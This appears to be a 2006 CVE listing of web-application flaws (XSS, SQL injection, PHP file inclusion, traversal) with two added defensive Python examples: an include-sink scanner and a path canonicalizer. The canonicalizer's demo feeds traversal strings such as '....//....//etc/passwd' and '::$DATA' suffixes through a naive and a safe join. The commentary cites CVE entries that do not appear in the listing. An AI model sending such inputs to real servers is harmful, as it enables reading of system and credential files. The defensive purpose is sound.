[CVE-2006-5631] Cross-site scripting (XSS) vulnerability in change_pass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML via arbitrary query strings when the action parameter is not "1", as demonstrated using script in the action parameter, a different vulnerability than CVE-2006-5632.
[CVE-2006-5626] Cross-site scripting (XSS) vulnerability in cms_images/js/htmlarea/htmlarea.php in phpFaber Content Management System (CMS) before 1.3.36 on 20061026 allows remote attackers to inject arbitrary web script or HTML, probably via arbitrary parameters in the query string, as demonstrated with a vigilon parameter. NOTE: earlier downloads of 1.3.36 have the vulnerability
[CVE-2006-5625] PHP remote file inclusion vulnerability in wwwdev/nxheader.inc.php in N/X 2002 Professional Edition Web Content Management System (WCMS) 4.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the c[path] parameter.
[CVE-2006-5607] Directory traversal vulnerability in /cgi-bin/webcm in INCA IM-204 allows remote attackers to read arbitrary files via a "/./." (modified dot dot) sequence in the getpage parameter.
[CVE-2006-5605] Multiple cross-site scripting (XSS) vulnerabilities in phpcards.footer.php in phpCards 1.3 allow remote attackers to inject arbitrary web script or HTML via the CardFontFace parameter and other unspecified parameters.
[CVE-2006-5600] Axalto Protiva 1.1, possibly only non-commercial versions, stores passwords in plaintext in files with insecure permissions, which allows local users to gain privileges by reading the passwords from (1) KeyTool\keytool.config or (2) webapps\protiva\WEB-INF\classes\authserver.config.
[CVE-2006-5599] Cross-site scripting (XSS) vulnerability in Oracle Application Express (formerly HTML DB) before 2.2.1 allows remote attackers to inject arbitrary HTML or web script via the WWV_FLOW_ITEM_HELP package. NOTE: it is likely that this issue overlaps one of the Oracle VulnIDs covered by CVE-2006-5351. Oracle has not publicly disputed claims by a reliable researcher that this has been fixed by the October 2006 CPU.
[CVE-2006-5598] Cross-site scripting (XSS) vulnerability in index.php for GOOP Gallery 2.0, and possibly other versions before 2.0.3, allows remote attackers to inject arbitrary HTML or web script via the image parameter.
[CVE-2006-5597] join.asp in MiniHTTP Web Forum & File Server PowerPack 4.0 allows remote attackers to add or modify arbitrary user accounts via modified (1) frmMailBox and (2) frmUserPass parameters.
[CVE-2006-5587] Multiple PHP remote file inclusion vulnerabilities in MDweb 1.3 and earlier (Mdweb132-postgres) allow remote attackers to execute arbitrary PHP code via a URL in the chemin_appli parameter in (1) admin/inc/organisations/form_org.inc.php and (2) admin/inc/organisations/country_insert.php.
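The remote file inclusion entries in this range (CVE-2006-6043, CVE-2006-6042, CVE-2006-5931, CVE-2006-5795, CVE-2006-5672, CVE-2006-5636, CVE-2006-5625, CVE-2006-5587 and others) share one shape: an `include`/`require` whose path is built from a variable the script never initialises, which `register_globals` lets a request populate with a URL. The scanner below is an added example, not code from any of those projects or from vulscan; the PHP fragment and php.ini text it runs over are constructed (the `$srcdir` name is borrowed from the OpenEMR entry, the line itself is invented), and `allow_url_include` is a later PHP setting the page does not mention.

```python
"""Find include/require sinks whose path starts with a variable, plus risky php.ini flags."""
import re

# include/require(_once), optional "(", then the argument up to the ";".
# Longer keywords first so "include_once" is not matched as "include" + "_once".
_INCLUDE = re.compile(
    r"\b(include_once|require_once|include|require)\s*\(?\s*(?P<arg>[^;]+?)\s*\)?\s*;",
    re.IGNORECASE,
)
# Argument begins with a variable ($DIR . '/x.php') or an interpolated string
# ("$srcdir/x.php"), or carries a request superglobal anywhere in it.
_VAR_FIRST = re.compile(r'^(\$\w+|"\$|"\{\$)')
_REQUEST_DATA = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")

_INI_FLAG = re.compile(
    r"^\s*(register_globals|allow_url_fopen|allow_url_include)\s*=\s*(\w+)",
    re.IGNORECASE | re.MULTILINE,
)


def find_variable_includes(source):
    """Return (line_no, argument) for every include whose target is variable-driven."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for m in _INCLUDE.finditer(line):
            arg = m.group("arg").strip()
            if _VAR_FIRST.match(arg) or _REQUEST_DATA.search(arg):
                hits.append((line_no, arg))
    return hits


def risky_ini_flags(ini_text):
    """Map each flag that turns a variable include into RFI to True when enabled."""
    return {name.lower(): value.lower() in ("on", "1", "true")
            for name, value in _INI_FLAG.findall(ini_text)}


# Constructed PHP fragment in the style of the affected scripts; not from any listed project.
SAMPLE_PHP = """<?php
require_once dirname(__FILE__) . '/config.php';
include($DIR . '/lib/functions.php');
include_once "$srcdir/billing/functions.php";
require $_GET['page'] . '.php';
include 'templates/header.php';
"""

# Constructed php.ini excerpt: the first two lines are the weak setting.
SAMPLE_INI = "register_globals = On\nallow_url_fopen = On\nallow_url_include = Off\n"

if __name__ == "__main__":
    for line_no, arg in find_variable_includes(SAMPLE_PHP):
        print(f"line {line_no}: include path is attacker-influenced: {arg}")
    print(risky_ini_flags(SAMPLE_INI))
```

A hit is only exploitable as remote inclusion when the variable is unset before the include and the runtime lets a request set it (`register_globals = On`) and fetch URLs (`allow_url_fopen`/`allow_url_include` on); with `register_globals = Off` the same line is still worth fixing, since a local file inclusion through the same variable may remain.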
[CVE-2006-5574] Unspecified vulnerability in the Brazilian Portuguese Grammar Checker in Microsoft Office 2003 and the Multilingual Interface for Office 2003, Project 2003, and Visio 2003 allows user-assisted remote attackers to execute arbitrary code via crafted text that is not properly parsed.
[CVE-2006-5564] Cross-site scripting (XSS) vulnerability in user.php in MAXdev MD-Pro 1.0.76 allows remote attackers to inject arbitrary web script or HTML via the op parameter. NOTE: the provenance of this information is unknown
[CVE-2006-5560] Cross-site scripting (XSS) vulnerability in heading.php in Boesch ProgSys 0.151 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/index.php, and unspecified vectors related to certain other files. NOTE: some of these details are obtained from third party information.
[CVE-2006-5537] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allow remote attackers to inject arbitrary web script or HTML via the (1) upnp:settings/state or (2) upnp:settings/connection parameters.
[CVE-2006-5536] Directory traversal vulnerability in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to read arbitrary files via a .. (dot dot) in the getpage parameter.
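Several entries above defeat a path check by giving the filesystem a name the check does not see the same way: a trailing space that Windows discards (CVE-2006-6104, `Web.Config%20`), an NTFS stream suffix that opens the same bytes (CVE-2006-5714 and CVE-2006-5715, `::$DATA`), and `..` or `/./.` sequences that a single-pass filter misses (CVE-2006-5607, CVE-2006-5536, CVE-2006-5846, CVE-2006-5773). The common fix is to canonicalize the request path into the form the filesystem will actually open, and only then anchor it under the document root. The code below is an added example, not from any product listed here or from vulscan; the document root and the request paths are constructed, and the strip-once filter in `naive_join` is a generic weak pattern, not a claim about any particular product's code.

```python
"""Canonicalize a request path the way the target filesystem will, before checking it."""
import posixpath
import re
from urllib.parse import unquote

# Constructed document root for the example; the page names none.
WEB_ROOT = "/var/www/htdocs"

# NTFS stream suffix: "x.asp::$DATA" (the unnamed data stream, as in
# CVE-2006-5714/5715) or "x.asp:name:$DATA" for a named stream.
_ADS_SUFFIX = re.compile(r":[^/\\:]*:\$DATA$", re.IGNORECASE)


def canonicalize(request_path):
    """Return the absolute, normalized path the filesystem would actually open."""
    decoded = request_path
    for _ in range(3):                         # decode until stable: %252e -> %2e -> .
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    decoded = decoded.replace("\\", "/")       # Windows accepts either separator
    decoded = _ADS_SUFFIX.sub("", decoded)     # "::$DATA" names the same bytes
    # Anchor at a single "/" (normpath keeps a leading "//" as-is).
    path = posixpath.normpath("/" + decoded.lstrip("/"))
    # Win32 drops trailing spaces and dots from the last component, so a
    # request for "Web.Config%20" (CVE-2006-6104) opens Web.Config.
    return path.rstrip(" .")


def naive_join(root, request_path):
    """The weak pattern: strip "../" once, then concatenate."""
    return root + "/" + request_path.replace("../", "")


def safe_join(root, request_path):
    """Canonicalize first, then anchor under root; the result cannot leave root."""
    canonical = canonicalize(request_path)
    return posixpath.normpath(posixpath.join(root, canonical.lstrip("/")))


def escapes_root(root, target):
    """True if target, once normalized, lies outside root."""
    resolved = posixpath.normpath(target)
    return resolved != root and not resolved.startswith(root.rstrip("/") + "/")


if __name__ == "__main__":
    # Constructed request paths, each one a disguise the entries above describe.
    for req in ("/default.asp::$DATA", "/Web.Config%20", "....//....//etc/passwd"):
        print(f"{req!r:32} -> {canonicalize(req)!r}")
        print("   naive escapes root:", escapes_root(WEB_ROOT, naive_join(WEB_ROOT, req)))
        print("   safe  escapes root:", escapes_root(WEB_ROOT, safe_join(WEB_ROOT, req)))
```

Two details carry the weight: decoding is repeated until the string stops changing, so a double-encoded `..` cannot survive a single `unquote`, and the `..` collapse happens on an absolute path, which `posixpath.normpath` cannot walk above `/`. The trailing-space and stream-suffix rules are Windows/NTFS behaviour; applying them on a Unix host is harmless, because a file whose real name ends in a space or contains `:$DATA` is not something a web root should serve anyway.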
[CVE-2006-5535] Multiple cross-site scripting (XSS) vulnerabilities in WebHostManager (WHM) 10.8.0 cPanel 10.9.0 R50 allow remote attackers to inject arbitrary web script or HTML via the (1) theme parameter to scripts/dosetmytheme and the (2) template parameter to scripts2/editzonetemplate.
[CVE-2006-5534] Multiple cross-site scripting (XSS) vulnerabilities in index.htm in Zwahlen Online Shop Freeware 5.2.2.50, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) Kat, (3) id, or (4) no parameters. NOTE: some of these details are obtained from third party information.
[CVE-2006-5532] Cross-site scripting (XSS) vulnerability in rmgs/images.php in RMSOFT Gallery System 2.0 allows remote attackers to inject arbitrary web script or HTML via the kw parameter. NOTE: some of these details are obtained from third party information.
[CVE-2006-5530] Multiple cross-site scripting (XSS) vulnerabilities in Boesch SimpNews before 2.34.01 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) admin/index.php, (2) admin/pwlost.php, and unspecified other files. NOTE: the provenance of this information is unknown
[CVE-2006-5529] Cross-site scripting (XSS) vulnerability in smumdadotcom_ascyb_alumni/mod.php in SchoolAlumni Portal 2.26 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search operation in the katalog module. NOTE: some of these details are obtained from third party information.
[CVE-2006-5524] Cross-site scripting (XSS) vulnerability in index.php in phplist 2.10.2 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: This issue might overlap CVE-2006-5321.
[CVE-2006-5516] Multiple cross-site scripting (XSS) vulnerabilities in actions/usersettings.php in WikiNi before 0.4.4 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) email parameters to wakka.php.
[CVE-2006-5514] SQL injection vulnerability in quiz.php in Web Group Communication Center (WGCC) 0.5.6b and earlier allows remote attackers to execute arbitrary SQL commands via the qzid parameter.
[CVE-2006-5512] Cross-site scripting (XSS) vulnerability in article.htm in Zwahlen Online Shop allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-5511] Direct static code injection vulnerability in delete.php in JaxUltraBB (JUBB) 2.0, when register_globals is enabled, allows remote attackers to inject arbitrary web script, HTML, or PHP via the contents parameter, whose value is prepended to the file specified by the forum parameter.
[CVE-2006-5504] Cross-site scripting (XSS) vulnerability in index.php in Simple Machines Forum (SMF) allows remote attackers to inject arbitrary web script or HTML via a base64 encoded params value in the action parameter.
[CVE-2006-5503] Cross-site scripting (XSS) vulnerability in index.php in Simple Machines Forum (SMF) 1.1 RC2 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2006-5500] Multiple SQL injection vulnerabilities in the checkUser function in inc/DBInterface.php in XchangeBoard 1.70 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) userNick or (2) password parameters. NOTE: the provenance of this information is unknown
[CVE-2006-5499] Multiple cross-site scripting (XSS) vulnerabilities in Serendipity (s9y) 1.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in the media manager administration page.
[CVE-2006-5496] Multiple cross-site scripting (XSS) vulnerabilities in Timothy Claason KnowledgeBank 1.01 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) index.php, (2) addknowledge.php, and (3) addscreenshot.php.
[CVE-2006-5495] Multiple PHP remote file inclusion vulnerabilities in Trawler Web CMS 1.8.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) path_red2 parameter to (a) _msdazu_pdata/redaktion/artikel/up/index.php
[CVE-2006-5486] Cross-site scripting (XSS) vulnerability in Webmail in Sun Java System Messaging Server 6.0 through 6.2 and iPlanet Messaging Server 5.2 allows remote attackers to execute arbitrary Javascript via crafted messages.
[CVE-2006-5481] Multiple PHP remote file inclusion vulnerabilities in 2le.net Castor PHP Web Builder 1.1.1 allow remote attackers to execute arbitrary PHP code via the rootpath parameter in (1) lib/code.php, (2) lib/dbconnect.php, (3) lib/error.php, (4) lib/menu.php, and other unspecified files. NOTE: the provenance of this information is unknown
[CVE-2006-5480] PHP remote file inclusion vulnerability in lib/rs.php in 2le.net Castor PHP Web Builder 1.1.1 allows remote attackers to execute arbitrary PHP code via the rootpath parameter.
[CVE-2006-5475] Multiple cross-site scripting (XSS) vulnerabilities in the XML parser in Drupal 4.6.x before 4.6.10 and 4.7.x before 4.7.4 allow remote attackers to inject arbitrary web script or HTML via a crafted RSS feed.
[CVE-2006-5457] Multiple cross-site scripting (XSS) vulnerabilities in the registration form in Casinosoft Casino Script (Masvet) 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) surname field.
[CVE-2006-5453] Multiple cross-site scripting (XSS) vulnerabilities in Bugzilla 2.18.x before 2.18.6, 2.20.x before 2.20.3, 2.22.x before 2.22.1, and 2.23.x before 2.23.3 allow remote authenticated users to inject arbitrary web script or HTML via (1) page headers using the H1, H2, and H3 HTML tags in global/header.html.tmpl, (2) description fields of certain items in various edit cgi scripts, and (3) the id parameter in showdependencygraph.cgi.
[CVE-2006-5451] Multiple cross-site scripting (XSS) vulnerabilities in TorrentFlux 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) action, (2) file, and (3) users array variables in (a) admin.php, which are not properly handled when the administrator views the Activity Log
[CVE-2006-5447] Cross-site scripting (XSS) vulnerability in index.php in DEV Web Management System (WMS) 1.5 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2006-5441] PHP remote file inclusion vulnerability in adminfoot.php in Comdev Web Blogger 4.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. NOTE: the provenance of this information is unknown
[CVE-2006-5430] Cross-site scripting (XSS) vulnerability in the search functionality in db-central (dbc) Enterprise CMS and db-central CMS allows remote attackers to inject arbitrary web script or HTML via the needle parameter. NOTE: the provenance of this information is unknown
[CVE-2006-5416] Cross-site scripting (XSS) vulnerability in my.acctab.php3 in F5 Networks FirePass 1000 SSL VPN 5.5, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the sid parameter.
[CVE-2006-5411] Unrestricted file upload vulnerability in upload.php for Free Web Publishing System (FreeWPS), possibly 2.11 and earlier, allows remote attackers to upload and execute arbitrary PHP programs.
[CVE-2006-5409] Multiple SQL injection vulnerabilities in the wireless IDS management interface for Highwall Enterprise and Highwall Endpoint 4.0.2.11045 allow remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2006-5388] SQL injection vulnerability in index.php in WebSPELL 4.01.01 and earlier allows remote attackers to execute arbitrary SQL commands via the getsquad parameter, a different vector than CVE-2006-4783.
[CVE-2006-5386] PHP remote file inclusion vulnerability in process.php in NuralStorm Webmail 0.98b and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the DEFAULT_SKIN parameter.
[CVE-2006-5381] Contenido CMS stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain database credentials and other information via a direct request to (1) db_msql.inc, (2) db_mssql.inc, (3) db_mysqli.inc, (4) db_oci8.inc, (5) db_odbc.inc, (6) db_oracle.inc, (7) db_pgsql.inc, or (8) db_sybase.inc in the conlib/ directory.
[CVE-2006-5330] CRLF injection vulnerability in Adobe Flash Player plugin 9.0.16 and earlier for Windows, 7.0.63 and earlier for Linux, 7.x before 7.0 r67 for Solaris, and before 9.0.28.0 for Mac OS X, allows remote attackers to modify HTTP headers of client requests and conduct HTTP Request Splitting attacks via CRLF sequences in arguments to the ActionScript functions (1) XML.addRequestHeader and (2) XML.contentType. NOTE: the flexibility of the attack varies depending on the type of web browser being used.
[CVE-2006-5324] The Web Services Notification (WSN) security component of IBM WebSphere Application Server before 6.1.0.2 allows attackers to obtain unspecified access without supplying a username and password, aka PK28374.
[CVE-2006-5323] Unspecified vulnerability in IBM WebSphere Application Server before 6.1.0.2 has unspecified impact and attack vectors, related to a "possible security exposure," aka PK29360.
[CVE-2006-5321] Multiple cross-site scripting (XSS) vulnerabilities in phplist before 2.10.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-5318] PHP remote file inclusion vulnerability in index.php in Nayco JASmine (aka Jasmine-Web) allows remote attackers to execute arbitrary PHP code via an FTP URL in the section parameter.
[CVE-2006-5316] registroTL stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for /usuarios.dat.
[CVE-2006-5303] Secure Computing SafeWord RemoteAccess 2.1 allows local users to obtain the UserCenter webportal password, database encryption keys, and signing keys by reading (1) base-64 encoded data in SERVERS\Web\Tomcat\usercenter\WEB-INF\login.conf and (2) plaintext data in SERVERS\Shared\signers.cfg. NOTE: the provenance of this information is unknown
[CVE-2006-5299] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Gcontact 0.6.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-5294] Cross-site scripting (XSS) vulnerability in index.php in phplist before 2.10.3 allows remote attackers to inject arbitrary web script or HTML via the unsubscribeemail parameter.
[CVE-2006-5293] Cross-site scripting (XSS) vulnerability in index.php in PhpOutsourcing Noah's Classifieds 1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the frommethod parameter.
[CVE-2006-5290] The ESS/ Network Controller and MicroServer Web Server components of Xerox WorkCentre and WorkCentre Pro 232, 238, 245, 255, 265 and 275 allow remote attackers to bypass authentication and execute arbitrary code via "WebUI command injection on TCP/IP hostname."
[CVE-2006-5269] Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, probably related to an RPC interface.
[CVE-2006-5268] Unspecified vulnerability in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via vectors related to obtaining "administrative access to the RPC interface."
[CVE-2006-5264] Cross-site scripting (XSS) vulnerability in sql.php in MysqlDumper 1.21 b6 allows remote attackers to inject arbitrary web script or HTML via the db parameter.
[CVE-2006-5258] The spell checking component of (1) Asbru Web Content Management before 6.1.22, (2) Asbru Web Content Editor before 6.0.22, and (3) Asbru Website Manager before 6.0.22 allows remote attackers to execute arbitrary commands via an unspecified parameter that is not sanitized before Aspell is invoked.
[CVE-2006-5252] PHP remote file inclusion vulnerability in includes/core.lib.php in Webmedia Explorer 2.8.7 allows remote attackers to execute arbitrary PHP code via a URL in the path_include parameter.
[CVE-2006-5248] Eazy Cart stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a customer database via a direct request for admin/config/customer.dat. NOTE: the provenance of this information is unknown
[CVE-2006-5247] Multiple cross-site scripting (XSS) vulnerabilities in Eazy Cart allow remote attackers to inject arbitrary web script or HTML via easycart.php, possibly related to the (1) des and (2) qty parameters in an add action, and via other unspecified vectors. NOTE: some details are obtained from third party information.
[CVE-2006-5239] Multiple cross-site scripting (XSS) vulnerabilities in eXpBlog 0.3.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the query string (PHP_SELF) in kalender.php or (2) the captcha_session_code parameter in pre_details.php.
[CVE-2006-5234] ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in phpWebSite 0.10.2 allow remote attackers to execute arbitrary PHP code via a URL in the PHPWS_SOURCE_DIR parameter in (1) init.php, (2) users.php, (3) Cookie.php, (4) forms.php, (5) Groups.php, (6) ModSetting.php, (7) Calendar.php, (8) DateTime.php, (9) core.php, (10) ImgLibrary.php, (11) Manager.php, and (12) Template.php, and (13) EZform.php. NOTE: CVE disputes this report, since "PHPWS_SOURCE_DIR" is defined as a constant, not accessed as a variable.
[CVE-2006-5227] Cross-site scripting (XSS) vulnerability in admin.php in TorrentFlux 2.1 allows remote attackers to inject arbitrary web script or HTML via (1) the $user_agent variable, probably obtained from the User-Agent HTTP header, and possibly (2) the $ip_resolved variable.
[CVE-2006-5220] Multiple PHP remote file inclusion vulnerabilities in WebYep 1.1.9, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via the webyep_sIncludePath in (1) files in the programm/lib/ directory including (a) WYApplication.php, (b) WYDocument.php, (c) WYEditor.php, (d) WYElement.php, (e) WYFile.php, (f) WYHTMLTag.php, (g) WYImage.php, (h) WYLanguage.php, (i) WYLink.php, (j) WYPath.php, (k) WYPopupWindowLink.php, (l) WYSelectMenu.php, and (m) WYTextArea.php
[CVE-2006-5210] Directory traversal vulnerability in IronWebMail before 6.1.1 HotFix-17 allows remote attackers to read arbitrary files via a GET request to the IM_FILE identifier with double-url-encoded "../" sequences ("%252e%252e/").
[CVE-2006-5204] Cross-site scripting (XSS) vulnerability in action_admin/member.php in Invision Power Board (IPB) 2.1.7 and earlier allows remote authenticated users to inject arbitrary web script or HTML via a reference to a script in the avatar setting, which can be leveraged for a cross-site request forgery (CSRF) attack involving forced SQL execution by an admin.
[CVE-2006-5203] Invision Power Board (IPB) 2.1.7 and earlier allows remote restricted administrators to inject arbitrary web script or HTML, or execute arbitrary SQL commands, via a forum description that contains a crafted image with PHP code, which is executed when the user visits the "Manage Forums" link in the Admin control panel.
[CVE-2006-5197] PDshopPro stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) /pdshoppro.mdb, (2) /data/pdshoppro.mdb, or (3) /shoppro/data/pdshoppro.mdb.
[CVE-2006-5196] The HTTP interface in the Motorola SURFboard SB4200 Cable Modem allows remote attackers to cause a denial of service (device crash) via a request with MfcISAPICommand set to SecretProc and a long string in the Secret parameter.
[CVE-2006-5195] Multiple cross-site scripting (XSS) vulnerabilities in Wheatblog 1.0 and 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown
[CVE-2006-5194] Cross-site scripting (XSS) vulnerability in index.php in net2ftp 0.93 allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: some of these details are obtained from third party information.
[CVE-2006-5190] Multiple cross-site scripting (XSS) vulnerabilities in osCommerce 2.2 Milestone 2 Update 060817 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter in the (a) banner_manager.php, (b) banner_statistics.php, (c) countries.php, (d) currencies.php, (e) languages.php, (f) manufacturers.php, (g) newsletters.php, (h) orders_status.php, (i) products_attributes.php, (j) products_expected.php, (k) reviews.php, (l) specials.php, (m) stats_products_purchased.php, (n) stats_products_viewed.php, (o) tax_classes.php, (p) tax_rates.php, or (q) zones.php scripts in /admin, and the (2) zpage parameter in (r) admin/geo_zones.php.
[CVE-2006-5188] Directory traversal vulnerability in download.php in webGENEius GOOP Gallery 2.0.2 allows remote attackers to read or list data from certain files or directories via unspecified vectors.
[CVE-2006-5181] Multiple PHP remote file inclusion vulnerabilities in Joshua Muheim phpMyWebmin 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the target parameter in (1) change_preferences2.php, (2) create_file.php, (3) upload_local.php, and (4) upload_multi.php, different vectors than CVE-2006-5124.
[CVE-2006-5175] Cross-site request forgery (CSRF) vulnerability in the administrative interface for the TeraStation HD-HTGL firmware 2.05 beta 1 and earlier allows remote attackers to modify configurations or delete arbitrary data via unspecified vectors.
[CVE-2006-5172] Stack-based buffer overflow in the RPC interface in Mediasvr.exe in Computer Associates (CA) Brightstor ARCserve Backup 9.01 through 11.5, Enterprise Backup 10.5, and CA Protection Suites r2 allows remote attackers to execute arbitrary code via crafted SUNRPC packets, aka the "Mediasvr.exe String Handling Overflow," a different vulnerability than CVE-2006-5171.
[CVE-2006-5171] Stack-based buffer overflow in the RPC interface in Mediasvr.exe in Computer Associates (CA) Brightstor ARCserve Backup 9.01 through 11.5, Enterprise Backup 10.5, and CA Protection Suites r2 allows remote attackers to execute arbitrary code via crafted SUNRPC packets, aka the "Mediasvr.exe Overflow," a different vulnerability than CVE-2006-5172.
[CVE-2006-5169] Cross-site scripting (XSS) vulnerability in John Himmelman (aka DaRk2k1) PowerPortal 1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to registering a user. NOTE: the provenance of this information is unknown
[CVE-2006-5168] Cross-site scripting (XSS) vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2006-5166] PHP remote file inclusion vulnerability in functions.php in PHP Web Scripts Easy Banner Free allows remote attackers to execute arbitrary PHP code via a URL in the s[phppath] parameter.
[CVE-2006-5164] Multiple cross-site scripting (XSS) vulnerabilities in cart.php in Sum Effect Software digiSHOP 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) sortBy or (2) search parameters.
[CVE-2006-5161] IBM Client Security Password Manager stores and distributes saved passwords based upon the title of a website, which allows remote attackers to obtain username and password credentials by changing the title of an HTML page.
[CVE-2006-5152] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL that is returned in a large HTTP 404 error message without an explicit charset, a related issue to CVE-2006-0032.
[CVE-2006-5147] PHP remote file inclusion vulnerability in wamp_dir/setup/yesno.phtml in VAMP Webmail 2.0beta1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the no_url parameter.
[CVE-2006-5146] Multiple cross-site scripting (XSS) vulnerabilities in Yblog allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in (a) funk.php, or the (2) action parameter in (b) tem.php and (c) uss.php.
[CVE-2006-5144] Cross-site scripting (XSS) vulnerability in userupload.php in OlateDownload 3.4.0 allows remote attackers to inject arbitrary web script or HTML via the description_small parameter.
[CVE-2006-5139] Unspecified vulnerability in MkPortal allows remote attackers to corrupt web site content, and possibly have other impact, via a certain long Message that affects "Tables," related to the Urlobox.
[CVE-2006-5134] Mercury SiteScope 8.2 (8.1.2.0) allows remote authenticated users to cause a denial of service (loss of connectivity to the classic interface) via attempted HTML injection into the "new monitor description" field.
[CVE-2006-5130] Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC1 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) url, (3) title, and (4) about parameters in a forum post. NOTE: the provenance of this information is unknown
[CVE-2006-5129] Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC1 allow remote attackers to inject arbitrary web script or HTML via (1) the message parameter, and possibly other parameters, in module/shout/jafshout.php (aka the shoutbox)
[CVE-2006-5127] Multiple cross-site scripting (XSS) vulnerabilities in Bartels Schoene ConPresso before 4.0.5a allow remote attackers to inject arbitrary web script or HTML via (1) the nr parameter in detail.php, (2) the msg parameter in db_mysql.inc.php, and (3) the pos parameter in index.php.
[CVE-2006-5125] Directory traversal vulnerability in window.php, possibly used by home.php, in Joshua Muheim phpMyWebmin 1.0 allows remote attackers to obtain sensitive information via a directory name in the target parameter, which triggers a directory listing through the opendir function.
[CVE-2006-5124] Multiple PHP remote file inclusion vulnerabilities in Joshua Muheim phpMyWebmin 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) target and (2) action parameters in window.php, and possibly the (3) target parameter in home.php.
[CVE-2006-5122] Multiple cross-site scripting (XSS) vulnerabilities in Mercury SiteScope 8.2 (8.1.2.0) allow remote authenticated users to inject arbitrary web script or HTML via (1) "any field create name field" except "create new group name" or (2) any description field.
[CVE-2006-5120] Multiple cross-site scripting (XSS) vulnerabilities in Scott Metoyer Red Mombin 0.7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) index.php and (2) process_login.php.
[CVE-2006-5119] Multiple cross-site scripting (XSS) vulnerabilities in Zen Cart 1.3.5 allow remote attackers to inject arbitrary web script or HTML via the (1) admin_name or (2) admin_pass parameter in (a) admin/login.php, or the (3) admin_email parameter in (b) admin/password_forgotten.php.
[CVE-2006-5118] PHP remote file inclusion vulnerability in index.php3 in the PDD package for PHPSelect Web Development Division allows remote attackers to execute arbitrary PHP code via a URL in the Application_Root parameter.
[CVE-2006-5117] phpMyAdmin before 2.9.1-rc1 has a libraries directory under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via direct requests for certain files.
[CVE-2006-5114] Multiple cross-site scripting (XSS) vulnerabilities in wgate in SAP Internet Transaction Server (ITS) 6.1 and 6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) ~urlmime or (2) ~command parameter, different vectors than CVE-2003-0749.
[CVE-2006-5112] Buffer overflow in InterVations NaviCOPA Web Server 2.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2006-5110] Cross-site scripting (XSS) vulnerability in home.php in PHP Invoice 2.2 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different vector than CVE-2006-5074. NOTE: the provenance of this information is unknown
[CVE-2006-5108] Multiple cross-site scripting (XSS) vulnerabilities in Devellion CubeCart 2.0.x allow remote attackers to inject arbitrary web script or HTML via the order_id parameter in (1) admin/print_order.php and (2) view_order.php
[CVE-2006-5106] Cross-site scripting (XSS) vulnerability in FacileForms before 1.4.7 for Mambo and Joomla!, when either register_globals or RG_EMULATION is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
